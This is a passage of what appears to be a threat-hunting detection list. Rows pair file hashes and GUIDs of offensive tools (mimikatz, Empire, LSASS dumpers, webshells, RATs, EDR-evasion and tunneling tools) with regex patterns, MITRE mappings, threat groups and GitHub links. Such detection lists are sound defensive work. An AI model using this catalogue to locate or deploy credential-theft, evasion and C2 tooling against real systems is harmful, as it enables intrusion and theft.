for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","23840" "*2bdfb1a641d40f9036e7f68adb158f4acd83a358af9a888e4e3e6ae757ea9b8d*",".{0,1000}2bdfb1a641d40f9036e7f68adb158f4acd83a358af9a888e4e3e6ae757ea9b8d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23842" "*2be38840c44daccf05553b5f2b60ee1344af95f9386c458317d353fd2d5aea5e*",".{0,1000}2be38840c44daccf05553b5f2b60ee1344af95f9386c458317d353fd2d5aea5e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23844" "*2bedfede524b3c27ab02fcdc3fd4b7e54c1aa83cad0e7642ff4c70700f51355a*",".{0,1000}2bedfede524b3c27ab02fcdc3fd4b7e54c1aa83cad0e7642ff4c70700f51355a.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","23847" "*2beff60039dfd82bd092bae6e69a92ed04cdcf7cfe597868bb161dbc15c3de73*",".{0,1000}2beff60039dfd82bd092bae6e69a92ed04cdcf7cfe597868bb161dbc15c3de73.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - 
TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","#filehash","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","23848" "*2c03dc7ed9a0770af9e8ba9c8fffa0e8b8ffcdf1f7efe5d2d33a32fe736989cd*",".{0,1000}2c03dc7ed9a0770af9e8ba9c8fffa0e8b8ffcdf1f7efe5d2d33a32fe736989cd.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","0","#filehash","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","23852" "*2C059FE7-C868-4C6D-AFA0-D62BA3C1B2E1*",".{0,1000}2C059FE7\-C868\-4C6D\-AFA0\-D62BA3C1B2E1.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","23853" "*2c08ea21df4710665340d0e5c3166db390dbc1edeb5ea9cd00f3d80c2523ac07*",".{0,1000}2c08ea21df4710665340d0e5c3166db390dbc1edeb5ea9cd00f3d80c2523ac07.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23854" "*2c0a115ffe1cb4d1672aa77035349763e0c2814bb9ffce04ee368c1b7874ac89*",".{0,1000}2c0a115ffe1cb4d1672aa77035349763e0c2814bb9ffce04ee368c1b7874ac89.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23855" "*2c0a644ec77673d8ec16808a8ac299733ee6e91a3fed0c8da41d6d73812b0d29*",".{0,1000}2c0a644ec77673d8ec16808a8ac299733ee6e91a3fed0c8da41d6d73812b0d29.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - 
T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","23856" "*2c1873b4fdd1abde90702784cb5870a06c8fe662cfc428c018d9052c89421351*",".{0,1000}2c1873b4fdd1abde90702784cb5870a06c8fe662cfc428c018d9052c89421351.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23858" "*2c1873b4fdd1abde90702784cb5870a06c8fe662cfc428c018d9052c89421351*",".{0,1000}2c1873b4fdd1abde90702784cb5870a06c8fe662cfc428c018d9052c89421351.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23859" "*2c23b4591d5a5909374fe009ddc2c97372254adb0ed0d63166445577456a5d55*",".{0,1000}2c23b4591d5a5909374fe009ddc2c97372254adb0ed0d63166445577456a5d55.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23860" "*2c25e65ae97f9652d4ab24abcc8c75a48e9b0446211feaeb0e8b138176086ef1*",".{0,1000}2c25e65ae97f9652d4ab24abcc8c75a48e9b0446211feaeb0e8b138176086ef1.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","23861" "*2c2ce45452521b88663a2ecba9eb2fd7605b3a2d67924bb59e9f318a2a26c82d*",".{0,1000}2c2ce45452521b88663a2ecba9eb2fd7605b3a2d67924bb59e9f318a2a26c82d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23863" "*2c2e002d5b85945c8f2d74211bf936268e37d086c4987c14909ade7fb2460e9a*",".{0,1000}2c2e002d5b85945c8f2d74211bf936268e37d086c4987c14909ade7fb2460e9a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23864" "*2c2e4a89c50f2f7fdb136b2435074b271f0574b0fa4629aacb6cffbc05d5940b*",".{0,1000}2c2e4a89c50f2f7fdb136b2435074b271f0574b0fa4629aacb6cffbc05d5940b.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","23865" "*2c3443b8a35d6734ff6a8e6c045bc0c65f134ae0a2937ec8986447113e9a3b98*",".{0,1000}2c3443b8a35d6734ff6a8e6c045bc0c65f134ae0a2937ec8986447113e9a3b98.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23866" "*2c45a08d77284fedd8074a5664e7c2424a94c6d131540010da2e73d8f520ebe7*",".{0,1000}2c45a08d77284fedd8074a5664e7c2424a94c6d131540010da2e73d8f520ebe7.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23868" "*2c46b513f01db94c79b9bf4a15b2965c38bbdd8272ad7e10266f5e04a67f16d0*",".{0,1000}2c46b513f01db94c79b9bf4a15b2965c38bbdd8272ad7e10266f5e04a67f16d0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23869" "*2c48923740a4fa2979907d801e7552ed940f19dca8e914898ca48b46b1f2330d*",".{0,1000}2c48923740a4fa2979907d801e7552ed940f19dca8e914898ca48b46b1f2330d.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23870" "*2c49f9006a48adaa0445950dcf5fe02141c0891c5fd23bec5e9f9fcd8ef8f291*",".{0,1000}2c49f9006a48adaa0445950dcf5fe02141c0891c5fd23bec5e9f9fcd8ef8f291.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23872" "*2c4c004c2c1a3864c15b74aacb0c9ecf069aa673c59194fd18667aeace3a07fd*",".{0,1000}2c4c004c2c1a3864c15b74aacb0c9ecf069aa673c59194fd18667aeace3a07fd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23873" "*2c511a9099fe0f45494a74446a1938f755a5f783c6ed40def55c2fe99543a571*",".{0,1000}2c511a9099fe0f45494a74446a1938f755a5f783c6ed40def55c2fe99543a571.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23875" "*2c64db7c942c64fee5fa3ec20a40b21172b91108b4d70a4db92edc5f6ae21d78*",".{0,1000}2c64db7c942c64fee5fa3ec20a40b21172b91108b4d70a4db92edc5f6ae21d78.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","23877" "*2c68949149436d573a53536888f124ada95ad5ce87962fbd2f349fb7693bf0e1*",".{0,1000}2c68949149436d573a53536888f124ada95ad5ce87962fbd2f349fb7693bf0e1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - 
T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","23878" "*2c68f74c83b924d84b0de8e4a75a44964ad5bf934d3b9ba0baec9732b70183de*",".{0,1000}2c68f74c83b924d84b0de8e4a75a44964ad5bf934d3b9ba0baec9732b70183de.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","23879" "*2C6D323A-B51F-47CB-AD37-972FD051D475*",".{0,1000}2C6D323A\-B51F\-47CB\-AD37\-972FD051D475.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#GUIDproject","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","23880" "*2c71826f310dd00b72e4838d3143745bc68d45e8d88f71c7c22caaabffbc4010*",".{0,1000}2c71826f310dd00b72e4838d3143745bc68d45e8d88f71c7c22caaabffbc4010.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23881" "*2c71dd5b47601d4b105d8da7007511045dd58f5d71b997290209d55f20dce887*",".{0,1000}2c71dd5b47601d4b105d8da7007511045dd58f5d71b997290209d55f20dce887.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - 
T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#filehash","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","23882" "*2c74050e41d9db2a3931b8d587dd3d1b9b73f6a428ea8c131d236ef6c1512752*",".{0,1000}2c74050e41d9db2a3931b8d587dd3d1b9b73f6a428ea8c131d236ef6c1512752.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23883" "*2c757f0065c167e633318ff8d43cb85cf936eae2db224f4e066098f4a8cb324a*",".{0,1000}2c757f0065c167e633318ff8d43cb85cf936eae2db224f4e066098f4a8cb324a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23884" "*2c7b76a89a8b9696eefc5144c590804f295ff593c9168c773d0b644c69acef8a*",".{0,1000}2c7b76a89a8b9696eefc5144c590804f295ff593c9168c773d0b644c69acef8a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23886" "*2C809982-78A1-4F1C-B0E8-C957C93B242F*",".{0,1000}2C809982\-78A1\-4F1C\-B0E8\-C957C93B242F.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - 
TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","#GUIDproject","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","23887" "*2c901d5da52c1766eb638b8d1b35a276121f0fb2a7156cb591b4f7ca054c1ed7*",".{0,1000}2c901d5da52c1766eb638b8d1b35a276121f0fb2a7156cb591b4f7ca054c1ed7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23889" "*2c96a3a04b62c87a9e5179230186d006f49dca951b230c1db6a543d5ee5ef2b6*",".{0,1000}2c96a3a04b62c87a9e5179230186d006f49dca951b230c1db6a543d5ee5ef2b6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23890" "*2c9c88011cd2b1c1af8c1a3dc31036ac22730723c50912e0f5c832f2a40b8b96*",".{0,1000}2c9c88011cd2b1c1af8c1a3dc31036ac22730723c50912e0f5c832f2a40b8b96.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23891" "*2c9fbc55ba53269120d7fb4fa0f7d5ba0e3ca8acc86385eeadb330ece4510090*",".{0,1000}2c9fbc55ba53269120d7fb4fa0f7d5ba0e3ca8acc86385eeadb330ece4510090.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN 
interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23893" "*2c9ffb6711e510c8087c1095324e7ceef0187de6526b13aff5ab1e775f5ed676*",".{0,1000}2c9ffb6711e510c8087c1095324e7ceef0187de6526b13aff5ab1e775f5ed676.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","23894" "*2cb57e3d7d12179f6e3388a62b906a138995da22a57e389079df8def186afc00*",".{0,1000}2cb57e3d7d12179f6e3388a62b906a138995da22a57e389079df8def186afc00.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23897" "*2cc9517df6d1839ac8bd5077a34ad43f2377e0e4fc9c024f5f9e44b150b94baf*",".{0,1000}2cc9517df6d1839ac8bd5077a34ad43f2377e0e4fc9c024f5f9e44b150b94baf.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23900" 
"*2cca313664b8df442b02f4115925c4803262da9df7f3efa84880357b16333f11*",".{0,1000}2cca313664b8df442b02f4115925c4803262da9df7f3efa84880357b16333f11.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","23901" "*2cd529d03729e9f59323391f57762c0952c6bd800ef46fd58855775bad7e7acc*",".{0,1000}2cd529d03729e9f59323391f57762c0952c6bd800ef46fd58855775bad7e7acc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23904" "*2cda68c8689a88d29b03ac53f3b10662971e95d2c6aa43970c76c0532a4dcfad*",".{0,1000}2cda68c8689a88d29b03ac53f3b10662971e95d2c6aa43970c76c0532a4dcfad.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","23905" 
